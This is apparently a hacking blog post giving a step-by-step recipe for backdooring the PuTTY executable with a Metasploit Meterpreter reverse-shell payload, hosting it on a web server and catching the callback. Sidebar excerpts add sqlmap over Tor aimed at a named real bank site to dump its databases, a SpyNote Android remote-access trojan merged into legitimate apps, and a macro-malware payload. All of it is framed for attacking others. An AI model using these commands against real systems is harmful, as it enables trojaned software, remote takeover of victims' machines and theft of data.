Skip to main content

Backdooring a Legit application using Metasploit

Backdooring an Executable:

Creating customized backdoored executables often took a long period of time to do manually as attackers. The ability to embed a Metasploit Payload in any executable that you want is simply brilliant. When we say any executable, it means any executable. You want to backdoor something you download from the internet?

We begin by first downloading our legitimate executable, in this case, the popular PuTTY client.

STEP 1:

Downloading Putty

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


STEP 2:

Start apache server using the following command:

service apache2 start

STEP 3:

Create the malicious executable using the following command:

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.43.15 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Note: Replace IP here with your own IP

STEP 4:

Open msfconsole and type the following commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit

STEP 5:

Make sure that your files are saved in /var/www/html

Access your malicious executable on windows machine and execute it.


As soon as the file executes, it opens a meterpreter shell. Windows hacked.



Happy Hacking ☺

Feel free to post your queries in the comment section below.

Comments

  1. Anonymous7 April 2022 at 07:23

    Backdooring A Legit Application Using Metasploit >>>>> Download Now

    >>>>> Download Full

    Backdooring A Legit Application Using Metasploit >>>>> Download LINK

    >>>>> Download Now

    Backdooring A Legit Application Using Metasploit >>>>> Download Full

    >>>>> Download LINK d3

    ReplyDelete

Post a Comment

Popular posts from this blog

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=...
3 comments
Read more

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java  STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default.   STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created  . STEP 5:  Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...
31 comments
Read more

MACRO Based Malware (updated)

  How macro malware works Macro malware hides in Microsoft Office files and are delivered as email attachments or inside ZIP files. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more. Macro malware was fairly common several years ago because macros ran automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware authors need to convince users to turn on macros so that their malware can run. They do this by showing fake warnings when a malicious document is opened. Prerequisite: Metasploit Module Windows 10 Microsoft Office STEP 1: Generating payload (VBS) - Open terminal in kali and execute the following command: - msfvenom -p windows/meterpreter/reverse_https lhost=192.168.43.138 lport=1234 -f vba STEP 2: Create a new excel file and open Macros Setting. Copy and paste the code generated(msfveno...
Post a Comment
Read more